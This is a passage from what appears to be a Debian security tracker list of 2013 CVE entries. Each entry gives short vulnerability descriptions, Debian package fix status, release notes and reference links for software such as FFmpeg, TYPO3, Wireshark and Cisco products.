scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...) NOT-FOR-US: Open-Xchange CVE-2013-7142 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...) NOT-FOR-US: Open-Xchange CVE-2013-7141 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...) NOT-FOR-US: Open-Xchange CVE-2013-7140 (XML External Entity (XXE) vulnerability in the CalDAV interface in Ope ...) NOT-FOR-US: Open-Xchange CVE-2013-7139 (SQL injection vulnerability in download.php in Horizon Quick Content M ...) NOT-FOR-US: Horizon CMS CVE-2013-7138 (Directory traversal vulnerability in lib/functions/d-load.php in Horiz ...) NOT-FOR-US: Horizon CMS CVE-2013-7137 (The "remember me" functionality in login.php in Burden before 1.8.1 al ...) NOT-FOR-US: Burden CVE-2013-7136 (The UPC Ireland Cisco EPC 2425 router (aka Horizon Box) does not have ...) NOT-FOR-US: Cisco CVE-2013-7135 (The Proc::Daemon module 0.14 for Perl uses world-writable permissions ...) - libproc-daemon-perl 0.14-2 (low; bug #732283) [wheezy] - libproc-daemon-perl (Minor issue) [squeeze] - libproc-daemon-perl (does not have pid_file option) NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=91450 CVE-2013-7134 (Juvia uses the same secret key for all installations, which allows rem ...) NOT-FOR-US: Juvia CVE-2013-7133 RESERVED CVE-2013-7132 RESERVED CVE-2013-7131 RESERVED CVE-2013-7130 (The i_create_images_and_backing (aka create_images_and_backing) method ...) - nova 2013.2.2 (low; bug #736465) [wheezy] - nova (Minor issue) NOTE: https://bugs.launchpad.net/nova/+bug/1251590 CVE-2013-7129 (Cross-site scripting (XSS) vulnerability in ThemeBeans Blooog theme 1. ...) NOT-FOR-US: WordPress theme CVE-2013-7128 (Valve Bug Reporter in the valve-bugreporter package 2.10+bsos1 in Valv ...) NOT-FOR-US: SteamOS CVE-2013-7127 (Apple Safari 6.0.5 on Mac OS X 10.7.5 and 10.8.5 stores cleartext cred ...) NOT-FOR-US: Apple Safari CVE-2013-7126 REJECTED CVE-2013-7125 REJECTED CVE-2013-7124 REJECTED CVE-2013-7123 REJECTED CVE-2013-7122 REJECTED CVE-2013-7121 REJECTED CVE-2013-7120 REJECTED CVE-2013-7119 REJECTED CVE-2013-7118 REJECTED CVE-2013-7117 REJECTED CVE-2013-7116 REJECTED CVE-2013-7115 REJECTED CVE-2013-7109 (OpenStack Swift as of 2013-12-15 mishandles PYTHON_EGG_CACHE ...) - glance 2012.1~e4-1 NOTE: https://github.com/openstack/glance/commit/804396204e23ebb CVE-2013-7105 (Buffer overflow in the Interstage HTTP Server log functionality, as us ...) NOT-FOR-US: Fujitsu Interstage HTTP Server CVE-2013-7104 (McAfee Email Gateway 7.6 allows remote authenticated administrators to ...) NOT-FOR-US: McAfee Email Gateway CVE-2013-7103 (McAfee Email Gateway 7.6 allows remote authenticated administrators to ...) NOT-FOR-US: McAfee Email Gateway CVE-2013-7102 (Multiple unrestricted file upload vulnerabilities in (1) media-upload. ...) NOT-FOR-US: WordPress theme OptimizePress CVE-2013-7101 RESERVED CVE-2013-7100 (Buffer overflow in the unpacksms16 function in apps/app_sms.c in Aster ...) {DSA-2835-1} NOTE: http://downloads.asterisk.org/pub/security/AST-2013-006.html - asterisk 1:11.7.0~dfsg-1 (bug #732355) CVE-2013-7099 RESERVED CVE-2013-7098 (OpenConnect VPN client with GnuTLS before 5.02 contains a heap overflo ...) - openconnect 5.02-1 CVE-2013-7097 (Directory traversal vulnerability in 7 Media Web Solutions eduTrac bef ...) NOT-FOR-US: eduTrac CVE-2013-7096 (Multiple SQL injection vulnerabilities in SAP EMR Unwired allow remote ...) NOT-FOR-US: Sap EMR CVE-2013-7095 (The XML parser (crm_flex_data) in SAP Customer Relationship Management ...) NOT-FOR-US: Sap CRM CVE-2013-7094 (SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in ...) NOT-FOR-US: SAP NetWeaver CVE-2013-7093 (SAP Network Interface Router (SAProuter) 39.3 SP4 allows remote attack ...) NOT-FOR-US: SAP Network Interface Router CVE-2013-7092 (Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/ ...) NOT-FOR-US: McAfee Email Gateway CVE-2013-7091 (Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,Aj ...) NOT-FOR-US: Zimbra CVE-2013-7090 RESERVED CVE-2013-7084 RESERVED CVE-2013-7114 (Multiple buffer overflows in the create_ntlmssp_v2_key function in epa ...) {DSA-2825-1} - wireshark 1.10.4-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: https://www.wireshark.org/security/wnpa-sec-2013-68.html CVE-2013-7113 (epan/dissectors/packet-bssgp.c in the BSSGP dissector in Wireshark 1.1 ...) {DSA-2825-1} - wireshark 1.10.4-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: https://www.wireshark.org/security/wnpa-sec-2013-67.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9488 CVE-2013-7112 (The dissect_sip_common function in epan/dissectors/packet-sip.c in the ...) {DLA-497-1} - wireshark 1.10.4-1 (unimportant) NOTE: https://www.wireshark.org/security/wnpa-sec-2013-66.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9388 NOTE: Not suitable for code injection CVE-2013-7111 (The put_call function in the API client (api/api_client.rb) in the Bas ...) NOT-FOR-US: Bio Basespace SDK Ruby Gem CVE-2013-7110 (Transifex command-line client before 0.10 does not validate X.509 cert ...) - transifex-client 0.10-1 [wheezy] - transifex-client (Incomplete patch was never released) NOTE: fix for CVE-2013-2073 was incorrect/incomplete NOTE: https://github.com/transifex/transifex-client/issues/42 NOTE: https://github.com/transifex/transifex-client/commit/6d69d61 CVE-2013-7108 (Multiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, a ...) {DSA-2956-1 DLA-1615-1 DLA-60-1} - icinga 1.10.2-1 (low) - nagios3 (low; bug #771466) [squeeze] - nagios3 (Minor issue) [wheezy] - nagios3 (Minor issue) NOTE: https://dev.icinga.org/issues/5251 NOTE: separate CVE requested for nagios, https://www.openwall.com/lists/oss-security/2013/12/23/4 NOTE: Fixed by https://sourceforge.net/p/nagios/nagioscore/ci/d97e03f32741a7d851826b03ed73ff4c9612a866/ CVE-2013-7107 (Cross-site request forgery (CSRF) vulnerability in cmd.cgi in Icinga 1 ...) {DSA-2956-1} - icinga 1.10.2-1 (low) [squeeze] - icinga (Minor issue) - nagios3 (low) [jessie] - nagios3 (Minor issue) [squeeze] - nagios3 (Minor issue) [wheezy] - nagios3 (Minor issue) NOTE: https://dev.icinga.org/issues/5346 CVE-2013-7106 (Multiple stack-based buffer overflows in Icinga before 1.8.5, 1.9 befo ...) {DSA-2956-1} - icinga 1.10.2-1 [squeeze] - icinga (Vulnerable code not present) NOTE: https://dev.icinga.org/issues/5250 CVE-2013-7083 RESERVED CVE-2013-7068 (The Organic Groups (OG) module 7.x-2.x before 7.x-2.3 for Drupal allow ...) NOT-FOR-US: Drupal module CVE-2013-7067 (The OG Features module 6.x-1.x before 6.x-1.4 for Drupal does not prop ...) NOT-FOR-US: Drupal module CVE-2013-7066 (The Entity reference module 7.x-1.x before 7.x-1.1-rc1 for Drupal allo ...) NOT-FOR-US: Drupal module CVE-2013-7065 (The Organic Groups (OG) module 7.x-2.x before 7.x-2.3 for Drupal allow ...) NOT-FOR-US: Drupal module CVE-2013-7064 (Cross-site scripting (XSS) vulnerability in the EU Cookie Compliance m ...) NOT-FOR-US: Drupal module CVE-2013-7063 (The Invitation module 7.x-2.x for Drupal does not properly check permi ...) NOT-FOR-US: Drupal module CVE-2013-7059 RESERVED CVE-2013-7058 RESERVED CVE-2013-7057 (Cross-site request forgery (CSRF) vulnerability in Axway SecureTranspo ...) NOT-FOR-US: Axway SecureTransport CVE-2013-7056 RESERVED CVE-2013-7055 (D-Link DIR-100 4.03B07 has PPTP and poe information disclosure ...) NOT-FOR-US: Router D-Link DIR-100 CVE-2013-7054 (D-Link DIR-100 4.03B07: cli.cgi XSS ...) NOT-FOR-US: Router D-Link DIR-100 CVE-2013-7053 (D-Link DIR-100 4.03B07: cli.cgi CSRF ...) NOT-FOR-US: Router D-Link DIR-100 CVE-2013-7052 (D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi ...) NOT-FOR-US: Router D-Link DIR-100 CVE-2013-7051 (D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to chec ...) NOT-FOR-US: Router D-Link DIR-100 CVE-2013-7047 RESERVED CVE-2013-7046 RESERVED CVE-2013-7045 RESERVED CVE-2013-7044 RESERVED CVE-2013-7043 (Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Sc ...) NOT-FOR-US: Cisco CVE-2013-7042 (SUSE Lifecycle Management Server (SLMS) before 1.3.7 uses world-readab ...) NOT-FOR-US: SUSE Lifecycle Management Server CVE-2013-7037 RESERVED CVE-2013-7036 RESERVED CVE-2013-7035 RESERVED CVE-2013-7034 (The setCookieValue function in _lib/functions.global.inc.php in LiveZi ...) NOT-FOR-US: LiveZilla CVE-2013-7033 (LiveZilla before 5.1.2.1 includes the operator password in plaintext i ...) NOT-FOR-US: LiveZilla CVE-2013-7032 (Multiple cross-site scripting (XSS) vulnerabilities in the web based o ...) NOT-FOR-US: LiveZilla CVE-2013-7031 RESERVED CVE-2013-7030 (** DISPUTED ** The TFTP service in Cisco Unified Communications Manage ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-7029 RESERVED CVE-2013-7028 RESERVED CVE-2013-7027 (The ieee80211_radiotap_iterator_init function in net/wireless/radiotap ...) - linux 3.11.7-1 (unimportant) [wheezy] - linux 3.2.53-1 - linux-2.6 (unimportant) NOTE: Non-issue: https://bugzilla.redhat.com/show_bug.cgi?id=1040010#c1 CVE-2013-7026 (Multiple race conditions in ipc/shm.c in the Linux kernel before 3.12. ...) - linux 3.12.5-1 [wheezy] - linux (Introduced in 8b8d52ac382b) - linux-2.6 (Introduced in 8b8d52ac382b) CVE-2013-7089 (ClamAV before 0.97.7: dbg_printhex possible information leak ...) - clamav 0.97.7+dfsg-1 NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=6804 CVE-2013-7088 (ClamAV before 0.97.7 has buffer overflow in the libclamav component ...) - clamav 0.97.7+dfsg-1 NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=6809 NOTE: https://github.com/vrtadmin/clamav-devel/commit/e8e3746266dd3f82054ca137b81b800e54de6ebd CVE-2013-7087 (ClamAV before 0.97.7 has WWPack corrupt heap memory ...) - clamav 0.97.7+dfsg-1 NOTE: https://github.com/vrtadmin/clamav-devel/commit/71990820d01c246e4e61408a3659dd9d92949b38 NOTE: from https://github.com/vrtadmin/clamav-devel/commits/master/libclamav/wwunpack.c CVE-2013-7086 (The message function in lib/webbynode/notify.rb in the Webbynode gem 1 ...) NOT-FOR-US: Ruby Gem Webbynode CVE-2013-7085 (Uscan in devscripts 2.13.5, when USCAN_EXCLUSION is enabled, allows re ...) - devscripts 2.13.9 (bug #732006) [wheezy] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) [squeeze] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) CVE-2013-7082 (Cross-site scripting (XSS) vulnerability in the errorAction method in ...) NOT-FOR-US: TYPO3 Flow NOTE: https://review.typo3.org/#/c/26176/ NOTE: CVE assigned for TYPO3 Flow, correspond to CVE-2013-7078 CVE-2013-7081 (The (old) Form Content Element component in TYPO3 4.5.0 through 4.5.31 ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26182/ CVE-2013-7080 (The creating record functionality in Extension table administration li ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26178/ CVE-2013-7079 (Open redirect vulnerability in the OpenID extension in TYPO3 4.5.0 thr ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26179/ CVE-2013-7078 (Cross-site scripting (XSS) vulnerability in the errorAction method in ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26176/ CVE-2013-7077 (Cross-site scripting (XSS) vulnerability in the Backend User Administr ...) - typo3-src (Affects versions 6.0.0 to 6.0.11, 6.1.0 to 6.1.6) CVE-2013-7076 (Cross-site scripting (XSS) vulnerability in Extension Manager in TYPO3 ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26181/ CVE-2013-7075 (The Content Editing Wizards component in TYPO3 4.5.0 through 4.5.31, 4 ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26175/ CVE-2013-7074 (Multiple cross-site scripting (XSS) vulnerabilities in Content Editing ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26184/ NOTE: https://review.typo3.org/#/c/26183/ NOTE: https://review.typo3.org/#/c/26177/ CVE-2013-7073 (The Content Editing Wizards component in TYPO3 4.5.0 through 4.5.31, 4 ...) {DSA-2834-1} - typo3-src 4.5.32+dfsg1-1 (bug #731999) NOTE: https://review.typo3.org/#/c/26180/ CVE-2013-7072 REJECTED CVE-2013-7071 (Cross-site scripting (XSS) vulnerability in the handle_request functio ...) NOT-FOR-US: Monitorix CVE-2013-7070 (The handle_request function in lib/HTTPServer.pm in Monitorix before 3 ...) NOT-FOR-US: Monitorix CVE-2013-7062 (Multiple cross-site scripting (XSS) vulnerabilities in Zope, as used i ...) - zope2.12 (low) [wheezy] - zope2.12 (Minor issue) - zope2.13 (Vulnerable code not present) CVE-2013-7061 (Products/CMFPlone/CatalogTool.py in Plone 3.3 through 4.3.2 allows rem ...) NOT-FOR-US: Plone CVE-2013-7060 (Products/CMFPlone/FactoryTool.py in Plone 3.3 through 4.3.2 allows rem ...) NOT-FOR-US: Plone CVE-2013-7049 (Stack-based buffer overflow in fish.cpp in the Fish plugin for ZNC, as ...) NOTE: vulnerable code not found in Debian NOTE: https://www.openwall.com/lists/oss-security/2013/12/11/14 NOT-FOR-US: FiSH Plugin for ZNC IRC Bouncer CVE-2013-7048 (OpenStack Compute (Nova) Grizzly 2013.1.4, Havana 2013.2.1, and earlie ...) - nova 2013.2.2 (bug #732022) [wheezy] - nova (Support for live snapshots added later) NOTE: https://bugs.launchpad.net/nova/+bug/1227027 CVE-2013-7050 (The get_main_source_dir function in scripts/uscan.pl in devscripts bef ...) - devscripts 2.13.8 (bug #731849) [wheezy] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) [squeeze] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) NOTE: http://anonscm.debian.org/gitweb/?p=collab-maint/devscripts.git;a=commitdiff;h=91f05b5 CVE-2013-7069 (ack 2.00 through 2.11_02 allows remote attackers to execute arbitrary ...) - ack-grep 2.12-1 (bug #731848) [wheezy] - ack-grep (don't support per-project .ackrc files) [squeeze] - ack-grep (don't support per-project .ackrc files) NOTE: https://github.com/petdance/ack2/issues/399 CVE-2013-7025 (Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlert ...) NOT-FOR-US: Dell SonicWALL Global Management System CVE-2013-7007 RESERVED CVE-2013-7006 RESERVED CVE-2013-7005 (D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware be ...) NOT-FOR-US: D-Link DSR-150 CVE-2013-7004 (D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware be ...) NOT-FOR-US: D-Link DSR-150 CVE-2013-7003 (Multiple cross-site scripting (XSS) vulnerabilities in LiveZilla befor ...) NOT-FOR-US: LiveZilla CVE-2013-7041 (The pam_userdb module for Pam uses a case-insensitive method to compar ...) - pam 1.1.8-3.1 (low; bug #731368) [squeeze] - pam (Minor issue) [wheezy] - pam (Minor issue) CVE-2013-7040 (Python 2.7 before 3.4 only uses the last eight bits of the prefix to r ...) - python2.5 (unimportant) - python2.6 (unimportant) - python2.7 (unimportant) - python3.1 (unimportant) - python3.2 (unimportant) - python3.3 (unimportant) - python3.4 3.4.0-1 (unimportant) NOTE: upstream tagged this as wontfix for versions older than 3.4 CVE-2013-7039 (Stack-based buffer overflow in the MHD_digest_auth_check function in l ...) - libmicrohttpd 0.9.32-1 (low; bug #731933) [wheezy] - libmicrohttpd 0.9.20-1+deb7u1 [squeeze] - libmicrohttpd (Minor issue, only expoitable in corner cases) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039390 CVE-2013-7038 (The MHD_http_unescape function in libmicrohttpd before 0.9.32 might al ...) - libmicrohttpd 0.9.32-1 (low; bug #731933) [squeeze] - libmicrohttpd (Minor issue) [wheezy] - libmicrohttpd (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039384 CVE-2013-7024 (The jpeg2000_decode_tile function in libavcodec/jpeg2000dec.c in FFmpe ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/fe448cd28d674c3eff3072552eae366d0b659ce9 NOTE: https://trac.ffmpeg.org/ticket/2921 NOTE: Only present in libav trunk CVE-2013-7023 (The ff_combine_frame function in libavcodec/parser.c in FFmpeg before ...) - ffmpeg (max_alloc not present in old ffmpeg/libav) - libav (max_alloc not present in old ffmpeg/libav) NOTE: https://github.com/FFmpeg/FFmpeg/commit/f31011e9abfb2ae75bb32bc44e2c34194c8dc40a NOTE: https://trac.ffmpeg.org/ticket/2982 CVE-2013-7022 (The g2m_init_buffers function in libavcodec/g2meet.c in FFmpeg before ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/e07ac727c1cc9eed39e7f9117c97006f719864bd NOTE: https://trac.ffmpeg.org/ticket/2971 NOTE: Only present in libav trunk CVE-2013-7021 (The filter_frame function in libavfilter/vf_fps.c in FFmpeg before 2.1 ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/cdd5df8189ff1537f7abe8defe971f80602cc2d2 NOTE: https://trac.ffmpeg.org/ticket/2905 CVE-2013-7020 (The read_header function in libavcodec/ffv1dec.c in FFmpeg before 2.1 ...) {DSA-3027-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.4-1 NOTE: https://github.com/FFmpeg/FFmpeg/commit/b05cd1ea7e45a836f7f6071a716c38bb30326e0f CVE-2013-7019 (The get_cox function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/a1b9004b768bef606ee98d417bceb9392ceb788d NOTE: https://trac.ffmpeg.org/ticket/2898 NOTE: Only present in libav trunk CVE-2013-7018 (libavcodec/jpeg2000dec.c in FFmpeg before 2.1 does not ensure the use ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/9a271a9368eaabf99e6c2046103acb33957e63b7 NOTE: https://trac.ffmpeg.org/ticket/2895 NOTE: Only present in libav trunk CVE-2013-7017 (libavcodec/jpeg2000.c in FFmpeg before 2.1 allows remote attackers to ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/912ce9dd2080c5837285a471d750fa311e09b555 NOTE: Only present in libav trunk CVE-2013-7016 (The get_siz function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/8bb11c3ca77b52e05a9ed1496a65f8a76e6e2d8f NOTE: https://trac.ffmpeg.org/ticket/2848 NOTE: Only present in libav trunk CVE-2013-7015 (The flashsv_decode_frame function in libavcodec/flashsv.c in FFmpeg be ...) {DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.11-1 NOTE: ffmpeg fix: https://github.com/FFmpeg/FFmpeg/commit/880c73cd76109697447fbfbaa8e5ee5683309446 NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=57070b1468edc6ac8cb3696c817f3c943975d4c1 NOTE: https://trac.ffmpeg.org/ticket/2844 CVE-2013-7014 (Integer signedness error in the add_bytes_l2_c function in libavcodec/ ...) {DSA-2855-1} - ffmpeg (Vulnerable code not present) - libav 6:9.11-1 NOTE: https://trac.ffmpeg.org/ticket/2919 NOTE: Fix in ffmpeg: https://github.com/FFmpeg/FFmpeg/commit/86736f59d6a527d8bc807d09b93f971c0fe0bb07 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=d1916d13e28b87f4b1b214231149e12e1d536b4b CVE-2013-7013 (The g2m_init_buffers function in libavcodec/g2meet.c in FFmpeg before ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/821a5938d100458f4d09d634041b05c860554ce0 NOTE: https://trac.ffmpeg.org/ticket/2922 NOTE: Only present in libav trunk CVE-2013-7012 (The get_siz function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...) - ffmpeg (Vulnerable code not present) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/780669ef7c23c00836a24921fcc6b03be2b8ca4a NOTE: https://trac.ffmpeg.org/ticket/3080 NOTE: Only present in libav trunk CVE-2013-7011 (The read_header function in libavcodec/ffv1dec.c in FFmpeg before 2.1 ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav (Reproducer fails on libav 0.8.9 and 9.11) NOTE: https://github.com/FFmpeg/FFmpeg/commit/547d690d676064069d44703a1917e0dab7e33445 NOTE: https://trac.ffmpeg.org/ticket/2906 CVE-2013-7010 (Multiple integer signedness errors in libavcodec/dsputil.c in FFmpeg b ...) {DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.11-1 NOTE: ffmpeg fix: https://github.com/FFmpeg/FFmpeg/commit/454a11a1c9c686c78aa97954306fb63453299760 NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=d1916d13e28b87f4b1b214231149e12e1d536b4b CVE-2013-7009 (The rpza_decode_stream function in libavcodec/rpza.c in FFmpeg before ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav (Not reproducible with 0.8.9) NOTE: https://github.com/FFmpeg/FFmpeg/commit/3819db745da2ac7fb3faacb116788c32f4753f34 NOTE: https://trac.ffmpeg.org/ticket/2850 CVE-2013-7008 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...) - ffmpeg (Vulnerable code not present) - libav (Crash not reproducable, libav code is different) NOTE: https://github.com/FFmpeg/FFmpeg/commit/29ffeef5e73b8f41ff3a3f2242d356759c66f91f NOTE: https://trac.ffmpeg.org/ticket/2927 CVE-2013-7002 (Cross-site scripting (XSS) vulnerability in mobile/php/translation/ind ...) NOT-FOR-US: LiveZilla CVE-2013-7001 (The Multimedia Messaging Centre (MMSC) in NowSMS Now SMS & MMS Gat ...) NOT-FOR-US: NowSMS CVE-2013-7000 (The Multimedia Messaging Centre (MMSC) in NowSMS Now SMS & MMS Gat ...) NOT-FOR-US: NowSMS CVE-2013-6999 (** DISPUTED ** The IsHandleEntrySecure function in win32k.sys in the k ...) NOT-FOR-US: Microsoft Windows Server 2008 SP2 CVE-2013-6998 REJECTED CVE-2013-6997 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange (O ...) NOT-FOR-US: Open-Xchange CVE-2013-6996 RESERVED CVE-2013-6995 REJECTED CVE-2013-6994 (OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext ...) NOT-FOR-US: OpenText Exceed OnDemand CVE-2013-6993 (Cross-site scripting (XSS) vulnerability in the Ad-minister plugin 0.6 ...) NOT-FOR-US: WordPress plugin Ad-minister CVE-2013-6992 (Cross-site request forgery (CSRF) vulnerability in askapache-firefox-a ...) NOT-FOR-US: WordPress plugin AskApache Firefox Adsense CVE-2013-6991 (Cross-site scripting (XSS) vulnerability in the WP-Cron Dashboard plug ...) NOT-FOR-US: WordPress plugin WP-Cron Dashboard CVE-2013-6990 (FortiGuard FortiAuthenticator before 3.0 allows remote administrators ...) NOT-FOR-US: FortiGuard FortiAuthenticator CVE-2013-6989 RESERVED CVE-2013-6988 RESERVED CVE-2013-6987 (Multiple directory traversal vulnerabilities in the FileBrowser compon ...) NOT-FOR-US: Synology DiskStation Manager CVE-2013-6986 (The ZippyYum Subway CA Kiosk app 3.4 for iOS uses cleartext storage in ...) NOT-FOR-US: ZippyYum CVE-2013-6984 RESERVED CVE-2013-6983 (SQL injection vulnerability in the web interface in Cisco Unified Pres ...) NOT-FOR-US: Cisco Unified Presence Server CVE-2013-6982 (The BGP implementation in Cisco NX-OS 6.2(2a) and earlier does not pro ...) NOT-FOR-US: Cisco NX-OS CVE-2013-6981 (Cisco IOS XE 3.7S(.1) and earlier allows remote attackers to cause a d ...) NOT-FOR-US: Cisco IOS XE CVE-2013-6980 RESERVED CVE-2013-6979 (The VTY authentication implementation in Cisco IOS XE 03.02.xxSE and 0 ...) NOT-FOR-US: Cisco IOS XE CVE-2013-6978 (The disaster recovery system (DRS) component in Cisco Unified Communic ...) NOT-FOR-US: Cisco CVE-2013-6977 RESERVED CVE-2013-6976 (Cross-site request forgery (CSRF) vulnerability in goform/Quick_setup ...) NOT-FOR-US: Cisco CVE-2013-6975 (Directory traversal vulnerability in the command-line interface in Cis ...) NOT-FOR-US: Cisco NX-OS CVE-2013-6974 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-6973 (Cisco WebEx Training Center allows remote attackers to discover regist ...) NOT-FOR-US: Cisco CVE-2013-6972 (Cisco WebEx Training Center allows remote attackers to discover sessio ...) NOT-FOR-US: Cisco CVE-2013-6971 (Open redirect vulnerability in Cisco WebEx Training Center allows remo ...) NOT-FOR-US: Cisco CVE-2013-6970 (Cisco WebEx Meeting Center allows remote attackers to obtain sensitive ...) NOT-FOR-US: Cisco CVE-2013-6969 (The training-registration page in Cisco WebEx Training Center allows r ...) NOT-FOR-US: Cisco CVE-2013-6968 (Cisco WebEx Training Center provides different error messages for regi ...) NOT-FOR-US: Cisco CVE-2013-6967 (Open redirect vulnerability in the mobile-browser subsystem in Cisco W ...) NOT-FOR-US: Cisco CVE-2013-6966 (Open redirect vulnerability in Cisco WebEx Training Center allows remo ...) NOT-FOR-US: Cisco CVE-2013-6965 (The registration component in Cisco WebEx Training Center provides the ...) NOT-FOR-US: Cisco CVE-2013-6964 (Cisco WebEx Meeting Center allows remote authenticated users to bypass ...) NOT-FOR-US: Cisco CVE-2013-6963 (Cross-site scripting (XSS) vulnerability in the registration component ...) NOT-FOR-US: Cisco CVE-2013-6962 (Cross-site scripting (XSS) vulnerability in the mobile-browser subsyst ...) NOT-FOR-US: Cisco CVE-2013-6961 (Cross-site scripting (XSS) vulnerability in the Collaboration Partner ...) NOT-FOR-US: Cisco CVE-2013-6960 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco WebEx Mee ...) NOT-FOR-US: Cisco CVE-2013-6959 (Open redirect vulnerability in Cisco WebEx Sales Center allows remote ...) NOT-FOR-US: Cisco CVE-2013-6958 (Juniper NetScreen Firewall running ScreenOS 5.4, 6.2, or 6.3, when the ...) NOT-FOR-US: Juniper NetScreen Firewall CVE-2013-6957 (Cross-site scripting (XSS) vulnerability in the web administrative com ...) NOT-FOR-US: Juniper CVE-2013-6956 (Cross-site scripting (XSS) vulnerability in the Secure Access Service ...) NOT-FOR-US: Juniper Junos Pulse Secure Access Service CVE-2013-6955 (webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 bef ...) NOT-FOR-US: Synology DiskStation Manager CVE-2013-6954 (The png_do_expand_palette function in libpng before 1.6.8 allows remot ...) {DSA-2923-1} - libpng (Vulnerable code introduced in 1.6.1) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1045561 NOTE: http://sourceforge.net/mailarchive/message.php?msg_id=31751422 CVE-2013-6953 (BlogEngine.NET 2.8.0.0 and earlier allows remote attackers to read use ...) NOT-FOR-US: BlogEngine.NET CVE-2013-6952 (The Belkin WeMo Home Automation firmware before 3949 has a hardcoded G ...) NOT-FOR-US: Belkin WeMo CVE-2013-6951 (The Belkin WeMo Home Automation firmware before 3949 does not maintain ...) NOT-FOR-US: Belkin WeMo CVE-2013-6950 (The Belkin WeMo Home Automation firmware before 3949 does not use SSL ...) NOT-FOR-US: Belkin WeMo CVE-2013-6949 (The Belkin WeMo Home Automation firmware before 3949 does not properly ...) NOT-FOR-US: Belkin WeMo CVE-2013-6948 (The peerAddresses API in the Belkin WeMo Home Automation firmware befo ...) NOT-FOR-US: Belkin WeMo CVE-2013-6947 RESERVED CVE-2013-6946 RESERVED CVE-2013-6945 (The M2M Broker in OSEHRA VistA, as distributed before September 30, 20 ...) - vista (bug #541242) CVE-2013-6944 (Cross-site scripting (XSS) vulnerability in the user interface in the ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6943 (Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9. ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6942 (Cross-site request forgery (CSRF) 